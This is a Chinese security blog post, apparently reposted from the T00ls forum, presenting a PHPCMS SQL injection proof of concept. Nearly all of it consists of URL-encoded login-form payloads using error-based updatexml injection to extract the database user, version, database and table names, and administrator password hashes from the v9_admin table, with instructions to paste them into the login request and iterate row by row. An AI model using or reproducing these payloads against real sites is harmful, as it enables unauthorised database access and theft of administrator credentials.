PHPCMS 最新高危注入0day POC

2021年8月23日20:01:34评论109 views字数 2174阅读7分14秒阅读模式

我们构造下爆出库、表、帐号密码

在登陆处修改username和password即可其他不要动

PHPCMS 最新高危注入0day POC
username=phpcms&password=123456%26username%3d%2527%2bunion%2bselect%2b%25272%2527%252c%2527test%255c%2527%252cupdatexml(1%252cconcat(0x5e24%252c(select%2buser())%252c0x5e24)%252c1)%252c%255c%2527123456%255c%2527%252c%255c%2527%255c%2527%252c%255c%2527%255c%2527%252c%255c%2527%255c%2527%252c%255c%2527%255c%2527%252c%255c%2527%255c%2527%252c%255c%25272%255c%2527%252c%255c%252710%255c%2527)%252c(%255c%25272%255c%2527%252c%255c%2527test%2527%252c%25275f1d7a84db00d2fce00b31a7fc73224f%2527%252c%2527123456%2527%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%2523

PHPCMS 最新高危注入0day POC

版本

username=phpcms&password=123456%26username%3d%2527%2bunion%2bselect%2b%25272%2527%252c%2527test%255c%2527%252cupdatexml(1%252cconcat(0x5e24%252c(select%2bversion())%252c0x5e24)%252c1)%252c%255c%2527123456%255c%2527%252c%255c%2527%255c%2527%252c%255c%2527%255c%2527%252c%255c%2527%255c%2527%252c%255c%2527%255c%2527%252c%255c%2527%255c%2527%252c%255c%25272%255c%2527%252c%255c%252710%255c%2527)%252c(%255c%25272%255c%2527%252c%255c%2527test%2527%252c%25275f1d7a84db00d2fce00b31a7fc73224f%2527%252c%2527123456%2527%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%2523

PHPCMS 最新高危注入0day POC
库

username=phpcms&password=123456%26username%3d%2527%2bunion%2bselect%2b%25272%2527%252c%2527test%255c%2527%252cupdatexml(1%252cconcat(0x5e24%252c(select%2bdatabases())%252c0x5e24)%252c1)%252c%255c%2527123456%255c%2527%252c%255c%2527%255c%2527%252c%255c%2527%255c%2527%252c%255c%2527%255c%2527%252c%255c%2527%255c%2527%252c%255c%2527%255c%2527%252c%255c%25272%255c%2527%252c%255c%252710%255c%2527)%252c(%255c%25272%255c%2527%252c%255c%2527test%2527%252c%25275f1d7a84db00d2fce00b31a7fc73224f%2527%252c%2527123456%2527%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%2523

PHPCMS 最新高危注入0day POC
爆出表

updatexml(1,concat(0x5e24,(select table_name from information_schema.tables where table_schema='phpcms' limit 0,1),0x5e24),1)

只要url编码一下替换一下就ok了

PHPCMS 最新高危注入0day POC
在 updatexml里必须只能有三个值

所以爆帐号密码要一个一个爆

如

updatexml(1,concat(0x5e24,(select password from v9_admin limit 0,1),0x5e24),1)

以此类推

PHPCMS 最新高危注入0day POC

原文地址：https://www.t00ls.net/thread-30744-1-1.html

本文始发于微信公众号（T00ls）：PHPCMS 最新高危注入0day POC

左青龙
微信扫一扫

右白虎
微信扫一扫

PHPCMS 最新高危注入0day POC

干货 | 支付金额类漏洞挖掘技巧总结

记一次价格500rmb的短信轰炸

【相关分享】内网信息收集

如何构建自己的自定义 C2 框架

如何使用CsWhispers向C#项目添加DInvoke和间接系统调用方法

深信服防火墙AF策略路由如何配置？

【OSCP】gigachad

CVE-2024-0015复现 (DubheCTF DayDream)

《生成式人工智能服务安全基本要求》原文参阅

网络安全工程师必知的系统敏感目录

发表评论

在线咨询

微信